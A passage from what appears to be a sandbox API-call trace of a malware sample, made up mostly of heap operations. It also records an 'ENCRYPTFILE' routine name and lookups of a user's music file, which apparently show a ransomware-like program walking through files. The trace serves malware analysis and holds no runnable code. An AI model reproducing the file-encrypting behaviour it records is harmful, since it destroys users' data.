dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0116.526] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0116.526] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0116.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0116.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0116.526] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0116.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0116.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0116.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5030 [0116.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0116.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x150) returned 0x43cc1c8 [0116.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5030 | out: hHeap=0x1780000) returned 1 [0116.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0116.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0116.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0116.527] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0116.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0116.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.528] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0116.528] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb787e6b0, ftCreationTime.dwHighDateTime=0x1d5e99a, ftLastAccessTime.dwLowDateTime=0x9ec83740, ftLastAccessTime.dwHighDateTime=0x1d5ea37, ftLastWriteTime.dwLowDateTime=0x9ec83740, ftLastWriteTime.dwHighDateTime=0x1d5ea37, nFileSizeHigh=0x0, nFileSizeLow=0xbb73, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="kEfh1XIhHEyxIZI.m4a", cAlternateFileName="KEFH1X~1.M4A")) returned 0x41ac040 [0116.528] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0116.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0116.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0116.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0116.528] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0116.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0116.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0116.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0116.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0116.529] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0116.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0116.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0116.529] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0116.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0116.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0116.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0116.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0116.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0116.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0116.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0116.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0116.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0116.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0116.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0116.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0116.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0116.532] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0116.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0116.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0116.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0116.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0116.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0116.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0116.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0116.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0116.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0116.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0116.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0116.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0116.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0116.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0116.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.534] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0116.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 